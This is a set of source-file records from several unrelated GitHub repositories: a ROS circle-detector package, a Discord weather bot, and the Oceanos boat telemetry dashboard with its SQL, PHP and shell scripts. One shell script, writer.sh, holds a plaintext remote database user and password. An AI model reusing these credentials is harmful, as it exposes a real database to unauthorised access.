"text": "# generated from catkin/cmake/template/pkg.context.pc.in\nCATKIN_PACKAGE_PREFIX = \"\"\nPROJECT_PKG_CONFIG_INCLUDE_DIRS = \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/devel/include\".split(';') if \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/devel/include\" != \"\" else []\nPROJECT_CATKIN_DEPENDS = \"hear_ros_bridge;cv_bridge;image_transport;roscpp;sensor_msgs;message_runtime;std_msgs\".replace(';', ' ')\nPKG_CONFIG_LIBRARIES_WITH_PREFIX = \"-lrosopencv_t\".split(';') if \"-lrosopencv_t\" != \"\" else []\nPROJECT_NAME = \"davis_corner\"\nPROJECT_SPACE_DIR = \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/devel\"\nPROJECT_VERSION = \"0.0.0\"\n"
},
{
"alpha_fraction": 0.7680412530899048,
"alphanum_fraction": 0.7680412530899048,
"avg_line_length": 47.5,
"blob_id": "dca96c72a2fb6e265550cdfd071695d11ae70ab3",
"content_id": "074090c4136645df54c0c1d3dcd10548676fcb38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 194,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 4,
"path": "/build/catkin_generated/installspace/davis_corner-msg-paths.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${davis_corner_DIR}/..\" \"msg\" davis_corner_MSG_INCLUDE_DIRS UNIQUE)\nset(davis_corner_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7022350430488586,
"alphanum_fraction": 0.7123287916183472,
"avg_line_length": 27.32653045654297,
"blob_id": "488390f20fea86c4f476904c67e1904aa3dbe99e",
"content_id": "dd0224b4232724350240ff9439da5afb4fab94bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1387,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 49,
"path": "/include/Circle_detector.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include <image_transport/image_transport.h>\n#include <cv_bridge/cv_bridge.h>\n#include <sensor_msgs/image_encodings.h>\n#include <opencv2/imgproc/imgproc.hpp>\n#include <opencv2/highgui/highgui.hpp>\n#include <opencv2/core/types.hpp>\n#include <cmath>\n#include \"std_msgs/Float32.h\"\n#include \"geometry_msgs/Point.h\"\n#include <sstream>\n#include <ros/ros.h>\n#include <iostream>\n#include \"medianFilter.hpp\"\n#include <opencv2/features2d.hpp>\n#include \"HEAR_core/InputPort.hpp\"\n#include \"HEAR_core/OutputPort.hpp\"\n#include \"HEAR_math/Vector2D.hpp\"\n#include \"HEAR_msg/Vector2DMsg.hpp\"\n#include \"HEAR_core/Block.hpp\"\n\nclass Circle_detector: public Block\n{\nprivate:\n Port* _output_port;\n\npublic:\n ros::NodeHandle nh_;\n ros::Publisher puby, pubx;\n image_transport::ImageTransport it_;\n image_transport::Subscriber image_sub_;\n float threshold;\n Vector2D<float> obj_pos;\n cv::Point2d _c_;\n Vector2DMsg pixel_location;\n std::vector<cv::Point2f> temp;\n const std::string OPENCV_WINDOW = \"Image window\";\n std::vector<cv::KeyPoint> keypoints;\n medianFilter* filter=new medianFilter();\n float point_of_interest;\n enum ports_id {OP_0_DATA};\n void process(DataMsg* t_msg, Port* t_port){};\n \n\n Circle_detector(ros::NodeHandle&);\n ~Circle_detector();\n\n void imageCb(const sensor_msgs::ImageConstPtr &msg);\n cv::SimpleBlobDetector::Params params;\n};"
},
{
"alpha_fraction": 0.6946107745170593,
"alphanum_fraction": 0.7005987763404846,
"avg_line_length": 61.625,
"blob_id": "343aef94854fc76872e2e5ff8529d586f369bec8",
"content_id": "be2f2642ed5fd26fd1d3126997447ca5abd12288",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 8,
"path": "/build/catkin_generated/pkg.installspace.context.pc.py",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from catkin/cmake/template/pkg.context.pc.in\nCATKIN_PACKAGE_PREFIX = \"\"\nPROJECT_PKG_CONFIG_INCLUDE_DIRS = \"${prefix}/include\".split(';') if \"${prefix}/include\" != \"\" else []\nPROJECT_CATKIN_DEPENDS = \"hear_ros_bridge;cv_bridge;image_transport;roscpp;sensor_msgs;message_runtime;std_msgs\".replace(';', ' ')\nPKG_CONFIG_LIBRARIES_WITH_PREFIX = \"-lrosopencv_t\".split(';') if \"-lrosopencv_t\" != \"\" else []\nPROJECT_NAME = \"davis_corner\"\nPROJECT_SPACE_DIR = \"/usr/local\"\nPROJECT_VERSION = \"0.0.0\"\n"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7764706015586853,
"avg_line_length": 85,
"blob_id": "d9ead411323b4ee72d2234319fd1d4db45193f53",
"content_id": "f0a4c7d1532fe1f131101dc3b2b9b86b8dd25958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 1,
"path": "/build/catkin_generated/ordered_paths.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "set(ORDERED_PATHS \"/home/ku-t2/catkin_ws_eventcamera/devel/lib;/opt/ros/melodic/lib\")"
},
{
"alpha_fraction": 0.5638512372970581,
"alphanum_fraction": 0.5860478281974792,
"avg_line_length": 26.53174591064453,
"blob_id": "afc75eb5fd71ce125e1bd4f221b14dc9e938b5ab",
"content_id": "d699c612d906bda0cb68c6701cebb0a5860217fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3469,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 126,
"path": "/src/Circle_detector.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"Circle_detector.hpp\"\n\n\n\nCircle_detector::Circle_detector(ros::NodeHandle &main_nodehandle)\n : it_(nh_)\n{\n nh_=main_nodehandle;\n\n this->_output_port = new OutputPort(ports_id::OP_0_DATA, this);\n _ports = {_output_port};\n\n image_sub_ = it_.subscribe(\"/EventsImage\", 1000,&Circle_detector::imageCb, this);\n puby = nh_.advertise<std_msgs::Float32>(\"camera_provider_y\", 1000);\n pubx = nh_.advertise<std_msgs::Float32>(\"camera_provider_x\", 1000);\n //cv::namedWindow(OPENCV_WINDOW);\n\n params.filterByArea = true;\n params.minArea = 2500;\n params.maxArea = 3500;\n\n // Filter by Circularity\n params.filterByCircularity = true;\n params.minCircularity = 0.1;\n\n // Filter by Convexity\n params.filterByConvexity = false;\n params.minConvexity = 0.2;\n\n // Filter by Inertia\n params.filterByInertia = false;\n params.minInertiaRatio = 0.2;\n\n threshold = 10;\n}\n\nCircle_detector::~Circle_detector()\n{\n //cv::destroyWindow(OPENCV_WINDOW);\n}\n\nvoid Circle_detector::imageCb(const sensor_msgs::ImageConstPtr &msg)\n\n{\n cv_bridge::CvImagePtr cv_ptr;\n try\n {\n cv_ptr = cv_bridge::toCvCopy(msg, sensor_msgs::image_encodings::TYPE_8UC1);\n }\n catch (cv_bridge::Exception &e)\n {\n\n ROS_ERROR(\"cv_bridge exception: %s\", e.what());\n\n return;\n }\n cv::Mat imgOriginal = cv_ptr->image;\n\n cv::Mat blurred,im_with_keypoints;\n cv::GaussianBlur(imgOriginal, blurred, cv::Size(5, 5), 0, 0);\n cv::bitwise_not(blurred, blurred);\n cv::Ptr<cv::SimpleBlobDetector> detector = cv::SimpleBlobDetector::create(params);\n detector->detect(blurred, keypoints);\n cv::drawKeypoints(blurred, keypoints, im_with_keypoints, cv::Scalar::all(-1), cv::DrawMatchesFlags::DRAW_RICH_KEYPOINTS);\n std::cout<<keypoints.size()<<std::endl;\n\n std_msgs::Float32 msg_y;\n std_msgs::Float32 msg_x;\n\n if (keypoints.size() == 0)\n {\n std::cout << \"EMPTY KEYPOINTS\\n\";\n puby.publish(msg_y);\n pubx.publish(msg_x);\n Vector2DMsg output_msg;\n output_msg.data = obj_pos;\n this->_output_port->receiveMsgData((DataMsg*) &output_msg);\n }\n\n else\n {\n float std_dev;\n temp.push_back(keypoints[0].pt);\n\n if (temp.size() == 3)\n {\n std_dev = filter->getStdDev(temp);\n //std::cout << std_dev << std::endl;\n if (std_dev < threshold)\n {\n _c_.x = temp.back().x;\n _c_.y = temp.back().y;\n msg_y.data = _c_.y-130;\n msg_x.data = _c_.x-173;\n obj_pos.y = _c_.y-130;\n obj_pos.x = _c_.x-173;\n puby.publish(msg_y);\n pubx.publish(msg_x);\n Vector2DMsg output_msg;\n output_msg.data = obj_pos;\n this->_output_port->receiveMsgData((DataMsg*) &output_msg);\n }\n\n else\n {\n std::cout << \"standard dev too high\\n\";\n _c_ = filter->getMedian(temp, _c_);\n msg_y.data = _c_.y-130;\n msg_x.data = _c_.x-173;\n obj_pos.y = _c_.y-130;\n obj_pos.x = _c_.x-173;\n puby.publish(msg_y);\n pubx.publish(msg_x);\n point_of_interest = sqrt((pow(_c_.x, 2)) + (_c_.y, 2));\n Vector2DMsg output_msg;\n output_msg.data = obj_pos;\n this->_output_port->receiveMsgData((DataMsg*) &output_msg);\n }\n temp.erase(temp.begin());\n }\n }\n\n // cv::imshow(\"Original\", imgOriginal); //show the original image\n // cv::imshow(\"im_with_keypoints\", im_with_keypoints); \n // cv::waitKey(1);\n}\n"
}
] | 23 |
arsumukha/Discord_bot
|
https://github.com/arsumukha/Discord_bot
|
d9796dc1aa1c03442ed9be7027262f45851a1ed0
|
fa231d470c8b9fe8b2649ddb4df00035dd70ee88
|
6d7529c22c10fac9e5c1559f3a461b8927b58295
|
refs/heads/main
| 2023-02-13T15:55:43.544526 | 2021-01-16T03:08:14 | 2021-01-16T03:08:14 | 330,069,651 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.774545431137085,
"alphanum_fraction": 0.7818182110786438,
"avg_line_length": 60.11111068725586,
"blob_id": "d81f29acdc91ce46f6bd63e9282cb34df093b0e7",
"content_id": "79afc863e0cb19fc5b3ac80f360b36082f8bd3f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 550,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 9,
"path": "/README.md",
"repo_name": "arsumukha/Discord_bot",
"src_encoding": "UTF-8",
"text": "# Discord_bot\nWeather bot for discord using python\nHello this is a discord bot for weather data.\nThe token id are saved in an .env file for security reasons ,please store your token Id in an .env or embed it directly in the python code .\nThe main.py is the discord chat bot program it uses discord modules and openweather api .\nThe keepalive.py is a program for webserver for accepting requests it uses flask to make it .\n\nFor Keeping the discord bot working 24/7 :\nuse uptimerobot.com -> for keeping server alive with a call interval every 5 mins .\n"
},
{
"alpha_fraction": 0.6179120540618896,
"alphanum_fraction": 0.6253312230110168,
"avg_line_length": 33.94444274902344,
"blob_id": "2c1910735e35037af5418281a9b6f1d736562c28",
"content_id": "6c4213e229614fa80d0b876a7bf7dd929e88d705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1887,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 54,
"path": "/main.py",
"repo_name": "arsumukha/Discord_bot",
"src_encoding": "UTF-8",
"text": "import discord\nimport os\nimport requests, json \nfrom keep_alive import keep_alive\n\nfrom datetime import datetime\nimport pytz\n\napi_key = os.getenv('TOKENS')\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n\ntz_NY = pytz.timezone('Asia/Kolkata') \nnow = datetime.now(tz_NY)\n\ntimes = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\nclient = discord.Client()\[email protected]\nasync def on_ready():\n print('we have logged in as {0.user}'.format(client))\n\[email protected]\nasync def on_message(message):\n if message.author==client.user:\n return\n if message.content.startswith(\"$time\"):\n await message.channel.send(times+\" IST\")\n if message.content.startswith(\"$help\"):\n await message.channel.send(\"Welcome to my app use $weather city_name to get the weather updates.Thank you\")\n if message.content.startswith('$weather'):\n city=message.content.split(\" \")\n city_name = city[1]\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name\n response = requests.get(complete_url)\n x = response.json() \n if x[\"cod\"] != \"404\":\n y = x[\"main\"]\n current_temperature = y[\"temp\"]\n current_pressure = y[\"pressure\"]\n current_humidiy = y[\"humidity\"]\n z = x[\"weather\"]\n weather_description = z[0][\"description\"]\n await message.channel.send(\"Place=\"+city_name+\" \\nTemperature (in kelvin unit) = \" +\n str(current_temperature) + \n \"\\n atmospheric pressure (in hPa unit) = \" +\n str(current_pressure) +\n \"\\n humidity (in percentage) = \" +\n str(current_humidiy) +\n \"\\n description = \" +\n str(weather_description)+\n \"\\n Temperature in celsius =\" +str(round(int(current_temperature)-273.15,2))) \n else:\n await message.channel.send(\"format for weather code is '$weather city'\")\nkeep_alive()\nclient.run(os.getenv('TOKEN'))\n"
}
] | 2 |
OceanosTeam/Monaco2019
|
https://github.com/OceanosTeam/Monaco2019
|
d759cdcaa461f125d3aecd0255d2f42c45ebfeb4
|
d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6
|
61428d27cebe8f08e9aad7aaf9b003c06f03e8a5
|
refs/heads/master
| 2022-05-02T12:03:45.331781 | 2022-03-31T00:13:29 | 2022-03-31T00:13:29 | 190,352,735 | 0 | 2 |
Apache-2.0
| 2019-06-05T08:06:04 | 2019-07-02T13:30:11 | 2019-07-02T22:39:58 |
JavaScript
|
[
{
"alpha_fraction": 0.7962962985038757,
"alphanum_fraction": 0.7962962985038757,
"avg_line_length": 53,
"blob_id": "df6e2dcea3cb3ca960ad54941e8b0e8c2902ea33",
"content_id": "258d40c11dd42207fdeecc0c3e2303b1e782698e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 1,
"path": "/communication/CAN/arduino_code/README.md",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "# Arduino code for Kelly KLS controller CAN data read\n"
},
{
"alpha_fraction": 0.746300220489502,
"alphanum_fraction": 0.7610993385314941,
"avg_line_length": 17.920000076293945,
"blob_id": "9ae862c27c854e6e717e3f144b0b3429c080bf84",
"content_id": "4a2121493155d4291ce6c7b3b79288bad52192d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 25,
"path": "/communication/CAN/SerialLog/test.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\n\nimport time\nimport serial\nfrom serial import Serial\nfrom datetime import datetime\nimport struct\nimport sys\n# from collections import namedtuple\nimport numpy as np\nimport mysql.connector as sql\nfrom scipy import interpolate\n\n\nVdata = np.genfromtxt('oceanos_cell_discharge_capacity_14s.csv', dtype=float, delimiter=',', names=True)\nvx = Vdata['voltage']\nvy = Vdata['Percentage']\nf = interpolate.interp1d(vx, vy)\n\n# print(vx)\n\nenergy = f(57.0)\n\n\nprint(energy)\n"
},
{
"alpha_fraction": 0.5928143858909607,
"alphanum_fraction": 0.6187624931335449,
"avg_line_length": 16.034482955932617,
"blob_id": "098c89a0f9f5dd9d2f055a245bc78b919b94f2ae",
"content_id": "344f4381adb69bbe057f6f034bd4d23669c5c0b9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 501,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 29,
"path": "/dashboard/motor/graph.js",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "var presets = window.chartColors;\nvar utils = Samples.utils;\nvar inputs = {\n\tmin: 0,\n\tmax: 100,\n\tcount: 0,\n\tdecimals: 2,\n\tcontinuity: 1\n};\n\nnew Chart('chart-false', {\n\ttype: line,\n\tdata: [{\n\t\tlabels: 'Temperature2',\n\t\tdatasets: [{\n\t\t\tbackgroundColor: utils.transparentize(preset.red),\n\t\t\tborderColor: presets.red,\n\t\t\tdata: [1,2,3,4,5],\n\t\t\tlabel: 'Temperature',\n\t\t\tfill: boundary\n\t\t}]\n\t},\n\toptions: Chart.helpers.merge(options, {\n\t\ttitle: {\n\t\t\ttext: 'WHAT IS THIS\",\n\t\t\tdisplay: true\n\t\t}\n\t})\n});\n\t \n\t\t \n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.7071428298950195,
"avg_line_length": 27,
"blob_id": "2b27d6c1cfb8318deb1c57a61596781b50732aa6",
"content_id": "7e3e4131bf73d1ac0f63cf4209adcf42bbbd5ce7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 140,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 5,
"path": "/deploy.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/bash\n\n\n\nssh -p 65002 [email protected] 'cd ./Monaco2019; git pull origin master; cd ./database/tools; ./db_installer.sh'\n"
},
{
"alpha_fraction": 0.5447570085525513,
"alphanum_fraction": 0.572890043258667,
"avg_line_length": 31.58333396911621,
"blob_id": "590a1fc3b4834868233dd89f715d7bc98e1668e0",
"content_id": "211f170be51dec5f02bccb1238fac7170bd0bf53",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 12,
"path": "/database/sql/gps.sql",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "-- ---------------------------\n-- Table structure for gps\n-- ---------------------------\nCREATE TABLE IF NOT EXISTS `gps` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `Latitude` DECIMAL(8,6) DEFAULT '0',\n `Longitude` DECIMAL(8,6) DEFAULT '0',\n `Speed` DECIMAL(4,2) DEFAULT '0',\n `Time` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n `serverSideName` VARCHAR(15) DEFAULT 'gps',\n PRIMARY KEY (`id`)\n);\n"
},
{
"alpha_fraction": 0.4507462680339813,
"alphanum_fraction": 0.46268656849861145,
"avg_line_length": 21.33333396911621,
"blob_id": "053d79c5fa616766aa72a934e28638d58742d728",
"content_id": "ac85158218b7419856d5f9e76cbde90dbae86a58",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 335,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 15,
"path": "/dashboard/motor/motor.js",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "var Motor;\nsetInterval(function() {\n $.ajax({\n type: \"GET\",\n url: \"motor.php\",\n dataType: \"JSON\",\n fail: function(e){\n console.log(\"FAILED\");\n },\n success: function(response) {\n Motor = response;\n speed_gauge.refresh(Motor.RPM);\n }\n });\n}, 1000);\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12,
"blob_id": "a71436ba9035a9d878f9ecf2cead1aea5a7bd6e3",
"content_id": "b4cceab9062121c1b542443e7b39406f9498a42a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 12,
"path": "/communication/SIM7600X/GPS/GPSloc.h",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#ifndef gpsloc_h\n#define gpsloc_h\n\nclass GPSloc{\npublic:\n\t float Lat,Log,Speed;\n\tGPSloc();\n\tGPSloc(float lat,float log,float speed);\n\t~GPSloc();\n};\n\n#endif\n"
},
{
"alpha_fraction": 0.6194968819618225,
"alphanum_fraction": 0.652515709400177,
"avg_line_length": 36.411766052246094,
"blob_id": "3466a4f89b38c6b39e1380dd4832e280719d2509",
"content_id": "2339f68a2b011bc6be3de70f6ae5506560e85a2a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 636,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 17,
"path": "/communication/SIM7600X/GPS/writer.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "load_file () {\n. $1\n}\n$ONHOST=\"sql126.main-host.eu\"\n$ONUSER=\"u322154547_root\"\n$ONDB=\"test\"\n$ONPASS=\"oceanos_2019\"\nCONF=\"./database_installer.rc\"\nload_file $CONF\nMYDB=\"$MYSQLPATH -h $OCDBHOST -u $OCUSER -D $OCDB --password=$OCPASS\"\nONLINEDB=\"$MYSQLPATH -h $ONBHOST -u $ONUSER -D $ONDB --password=$ONPASS\"\n\nif [ $1 -eq 1 ]; then\n\t$MYDB < reset_gps.sql &> /dev/null\nfi\nmysql --user=$OCUSER --database=$OCDB --password=$OCPASS -e \"INSERT INTO gps (Latitude, Longitude, Speed) VALUES ('$2', '$3', '$4');\"\nmysql --user=$ONUSER --database=$ONDB --password=$ONPASS -e \"INSERT INTO gps (Latitude, Longitude, Speed) VALUES ('$2', '$3', '$4');\"\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7008547186851501,
"avg_line_length": 23.526315689086914,
"blob_id": "1ffd98468fdda60df649cb9e69812cdb9a3f7589",
"content_id": "c8dc3d7dd6b5a21217740ee99e30f27cb30f1630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 19,
"path": "/communication/SIM7600X/GSM/cosmote_crawler.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "import urllib.request as urll \nimport re\n\nlink = 'http://myinternet.cosmote.gr/main'\nlink = 'file:///home/pi/Desktop/cosmote.html'\nf = urll.urlopen(link)\nmyfile = f.read()\nmyfile = str(myfile, 'latin-1')\n\nstring = '<span class=\"customClassTotalDataBalance\"></span>'\n\nmatches = re.findall(string, myfile);\nfirst = re.search(string, myfile).start()\nlast = first+len(string)\nnewstring = ''\nfor i in range(20):\n\tnewstring+=myfile[last+i]\n\nprint(newstring.split('<')[0])\n\n\n"
},
{
"alpha_fraction": 0.490285724401474,
"alphanum_fraction": 0.5497142672538757,
"avg_line_length": 33.10389709472656,
"blob_id": "1d24d92b016ec05199165726dce1cafe1d2d62cd",
"content_id": "03b558eafa8716f4ae52d6ad335dc05023f689d7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2626,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 77,
"path": "/dashboard/include/buttons.js",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "var redIcon = L.icon({\n iconUrl: '../include/assets/start.png',\n iconSize: [50, 50], // size of the icon\n});\nvar yellowIcon = L.icon({\n iconUrl: '../include/assets/buoy.png',\n iconSize: [25, 25], // size of the icon\n});\nvar mymap;\n$(\"#nav-btn a\").click(function(){\n $(\"#overlay-nav\").fadeToggle(200);\n $(this).toggleClass('btn-open-nav').toggleClass('btn-close-nav');\n});\n$(\"#map-btn a\").click(function(){\n $(\"#overlay-map\").fadeToggle(200);\n $(this).toggleClass('btn-open-map').toggleClass('btn-close-map');\n var center = [43.734344, 7.435083];\n mymap = L.map('mapid',{\n center: center,\n zoom: 16\n /*\n maxBounds: [\n //south west\n [43.734344, 7.435083],\n //north east\n [53.734344, 7.035083]\n ],*/\n })\n L.tileLayer('https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}.png?access_token=pk.eyJ1IjoibWFwYm94IiwiYSI6ImNpejY4NXVycTA2emYycXBndHRqcmZ3N3gifQ.rJcFIG214AriISLbB6B5aw', {\n maxZoom: 18,\n attribution: 'Map data © <a href=\"https://www.openstreetmap.org/\">OpenStreetMap</a> contributors, ' +\n '<a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">CC-BY-SA</a>, ' +\n 'Imagery © <a href=\"https://www.mapbox.com/\">Mapbox</a>',\n id: 'mapbox.streets'\n }).addTo(mymap);\n var start = [43.734344, 7.435083];\n var buoys = [[43.72915, 7.435384],[43.737631, 7.453043],[43.73884, 7.441092]];\n L.marker(start, {icon: redIcon}).addTo(mymap).bindPopup(\"<b>Starting Line</b>\");\n for (var key in buoys) {\n L.marker(buoys[key], {icon: yellowIcon}).addTo(mymap).bindPopup(\"<b>Buoy N\"+(parseInt(key)+1).toString()+\"</b>\");\n };\n L.circle([43.734344, 7.435083], 200, {\n color: 'red',\n fillColor: '#f03',\n fillOpacity: 0.5\n }).addTo(mymap).bindPopup(\"I am a circle.\");\n var latlngs = [\n start,\n buoys[0],\n buoys[1],\n buoys[2],\n start\n ];\n\n var polyline = L.polyline(latlngs, {color: 'red'}).addTo(mymap);\n //map.fitBounds(polyline.getBounds());\n var popup = L.popup();\n function onMapClick(e) {\n popup\n .setLatLng(e.latlng)\n .setContent(\"You clicked the map at \" + e.latlng.toString())\n .openOn(mymap);\n }\n\n mymap.on('click', onMapClick);\n});\n /*\n$('#overlay-nav').on('click', function(){\n $(\"#overlay-nav\").fadeToggle(200); \n $(\".button a\").toggleClass('btn-open').toggleClass('btn-close');\n open = false;\n});\n$('#overlay-map').on('click', function(){\n $(\"#overlay-map\").fadeToggle(200); \n $(\".button a\").toggleClass('btn-open').toggleClass('btn-close');\n open = false;\n});*/"
},
{
"alpha_fraction": 0.6461158990859985,
"alphanum_fraction": 0.6559802889823914,
"avg_line_length": 29.037036895751953,
"blob_id": "af05b09862867bb008abaa77647d175aa169e5cd",
"content_id": "09227d100b96ca86e78d5c677e1719fb95ba49de",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1623,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 54,
"path": "/dashboard/motor/motor.php",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "<?php\n/*\n\tCopyright (C) 2019 Oceanos NTUA Team\n\n\tThis program is free software: you can redistribute \n\tit and/or modify it under the terms of the GNU General Public License \n\tas published by the Free Software Foundation, either version 3 of the \n\tLicense, or (at your option) any later version.\n\n\tThis program is distributed in the hope that it will be useful,\n\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n\tGNU General Public License for more details.\n\n\tYou should have received a copy of the GNU General Public License\n\talong with this program. If not, see <http://www.gnu.org/licenses/>.\n\n\tYou can contact Técnico Solar Boat by email at: [email protected]\n or via our facebook page at https://fb.com/tecnico.solarboat \n*/\n\n$DB_HOST = 'localhost';\n$DB_NAME = 'test';\n$DB_USER = 'u322154547_root';\n$DB_PASS = '****';\n$mysqli = new mysqli($DB_HOST, $DB_USER, $DB_PASS, $DB_NAME);\n\nif (mysqli_connect_errno()) {\n\tprintf(\"Connect failed: %s\\n\", mysqli_connect_error());\n\texit();\n}\n\n$result = $mysqli->query('SELECT * FROM motor ORDER By id DESC LIMIT 1;');\nif ($result->num_rows > 0) {\n \t$row = $result->fetch_assoc();\n $table = [\n\t\t\t'speed' => $row['speed'],\n\t\t\t'throttle'=> $row['throttle'],\n\t\t\t'current' => $row['current'],\n\t\t\t'voltage' => $row['voltage'],\n\t\t\t'contTemp' => $row['contTemp'],\n \t\t\t'motorTemp' => $row['motorTemp'],\n\t\t\t'motErrCode'=> $row['motErrCode'],\n\t\t\t'cntStat' => $row['cntStat'],\n\t\t\t'swStat' => $row['swStat'],\n\t\t\t'Time' => $row['Time'],\n\t\t\t\n\t\t\t'id'=> $row['id']];\n}\nelse {\n\t$table = null;\n}\necho json_encode($table);\n?>\n"
},
{
"alpha_fraction": 0.5349271297454834,
"alphanum_fraction": 0.5943220257759094,
"avg_line_length": 23.108108520507812,
"blob_id": "9740cd036ffc41918796236e27f0bda7b1e2e7d5",
"content_id": "ff1d9543ca594b51628e809fa5ccfb8c62ea6322",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2677,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 111,
"path": "/communication/CAN/arduino_code/kls_can_read.ino/kls_can_read.ino.ino",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
